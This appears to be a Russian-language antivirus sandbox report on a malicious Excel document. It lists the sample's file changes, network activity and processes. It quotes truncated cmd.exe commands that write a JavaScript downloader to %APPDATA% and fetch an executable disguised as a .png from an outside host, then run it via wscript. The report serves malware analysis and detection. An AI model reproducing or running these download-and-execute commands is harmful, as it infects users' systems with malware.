Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c cd "%appdata%" &echo (function (Global){ >> 20.js &echo var dwlpath="%"^&"APPDATA%\\"; >> 20.js &echo var dwlfile="pokt.exe"; >> 20.js &echo var Url="http://disk.karelia.pro/eWZJifr/735.png...
- '<SYSTEM32>\cmd.exe' /c ping localhost & cd "%appdata%" & echo SaveToFile(FileDest, 2); >> 20.js &echo Close(); >> 20.js &echo return FileDest; >> 20.js &echo } >> 20.js &echo } >> 20.js &echo try...
Изменения в файловой системе
Создает следующие файлы
- %APPDATA%\20.js
- <Текущая директория>\53bc0000
- %APPDATA%\0pokt.exe
Удаляет следующие файлы
- %APPDATA%\20.js
Подменяет следующие файлы
- <PATH_SAMPLE>.xls
Сетевая активность
Подключается к
- 'di##.#arelia.pro':80
TCP
Запросы HTTP GET
- http://di##.#arelia.pro/eWZJifr/735.png
UDP
- DNS ASK di##.#arelia.pro
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\wscript.exe' "%APPDATA%\20.js"
Запускает на исполнение
- '<SYSTEM32>\ping.exe' localhost
- '<SYSTEM32>\ping.exe' localhost -n 5
- '<SYSTEM32>\cmd.exe' /c cd "%appdata%" &echo (function (Global){ >> 20.js &echo var dwlpath="%"^&"APPDATA%\\"; >> 20.js &echo var dwlfile="pokt.exe"; >> 20.js &echo var Url="http://disk.karelia.pro/eWZJifr/735.png... (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ping localhost & cd "%appdata%" & echo SaveToFile(FileDest, 2); >> 20.js &echo Close(); >> 20.js &echo return FileDest; >> 20.js &echo } >> 20.js &echo } >> 20.js &echo try... (со скрытым окном)
